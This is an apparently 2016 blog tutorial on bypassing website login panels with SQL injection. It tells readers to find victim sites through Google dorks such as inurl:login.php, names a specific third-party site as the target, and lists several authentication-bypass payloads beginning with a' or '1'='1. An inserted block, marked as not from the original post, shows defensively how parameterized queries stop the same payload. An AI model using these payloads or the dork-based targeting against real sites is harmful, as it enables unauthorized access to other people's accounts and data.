Saturday, April 16, 2016

SQL Injection Login Bypass

!! FOR EDUCATION PURPOSES ONLY !!
I Introduction
Today I'm gonna teach you how to bypass a login panel using SQL injection.

II Learning Basics
1) Google Dorks
What are Google dorks? Google dorks are search operators such as "inurl" and "intext" that narrow Google's results down to pages matching a pattern.

Why do we need that?
No, we really don't need that... Just kidding, of course we need that to get target websites!

How do we use it?
For example, go to Google and search: " inurl:login.php "
You'll see results like www.website.com/login.php

2) SQL
Structured Query Language (SQL) is a special-purpose programming language designed for managing data held in a relational database management system.
Reference? Of course, Wikipedia.

3) SQL injection
SQL injection is a kind of attack in which malicious input is inserted into SQL statements so that the database drops, updates, adds, views, etc. data it was never meant to.

III Finding target
After learning some basics, we will now get a target using Google dorks.
Examples of Google dorks:
inurl:login.php
inurl:admin.php
inurl:administrator.php
inurl:admin_login.php

IV Bypass Login
So after finding a target, we will now try to bypass it.
For example, this is our target:
http://www.voteforgoodleader.com/h/launch.php?m=home&sm=acc&l=en
Try logging in using " a' or '1'='1 " (without quotes) for both the password and the email.
And bam! We successfully bypassed the login!

Why?
For example, this is the query the application builds from our input:

select username,pass from users where username='a' or '1'='1' and password='a' or '1'='1' limit 0,1;

Because AND binds tighter than OR, the trailing or '1'='1' makes the whole WHERE clause true no matter what we typed, so the query returns the first row of the users table and the application logs us in as that user.
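To make the mechanism above concrete from the defender's side, here is an added example (not code from the original post) that builds the tutorial's query two ways against a constructed in-memory SQLite table: once by string concatenation, which is what makes the "a' or '1'='1" input work, and once with a parameterized query, which treats the same input as a plain string and rejects it. The table contents, the function names and the column name `password` are assumptions for this example.

```python
import sqlite3

# Constructed sample data for the example; not from any real site.
SAMPLE_USERS = [("alice", "correct-horse"), ("bob", "hunter2")]

def make_db():
    """Create an in-memory users table with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Assemble the query by concatenation, as in the tutorial's example.

    User input becomes part of the SQL text, so quotes in the input
    change the structure of the WHERE clause.
    """
    query = ("select username,password from users where username='" + username
             + "' and password='" + password + "' limit 0,1")
    row = conn.execute(query).fetchone()
    # Return the username the application would consider logged in, or None.
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Same query with bound parameters: the input is compared as data only."""
    query = ("select username,password from users "
             "where username=? and password=? limit 0,1")
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None

def demo():
    """Run the tutorial's payload against both versions and report the results."""
    conn = make_db()
    payload = "a' or '1'='1"
    return {
        "vulnerable": login_vulnerable(conn, payload, payload),      # 'alice'
        "parameterized": login_parameterized(conn, payload, payload),  # None
        "real_login": login_parameterized(conn, "bob", "hunter2"),     # 'bob'
    }

if __name__ == "__main__":
    print(demo())
```

With the concatenated query the payload logs the attacker in as the first row in the table (alice), which is exactly the `limit 0,1` behaviour the tutorial describes; with bound parameters the database looks for a user literally named `a' or '1'='1` and finds nothing. Plaintext password comparison is kept only to mirror the tutorial's query; a real application would compare a password hash, but that does not change the injection point.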

V Extras
If " a' or '1'='1 " didn't work, you can try some of these:
a' or true--
a' or 1=1--
a') or true--
a' or 1=1#
a) or ('')=('

VI Goodbye
That's all for now, hope you enjoyed my tutorial! If you have any feedback or questions, please feel free to comment.
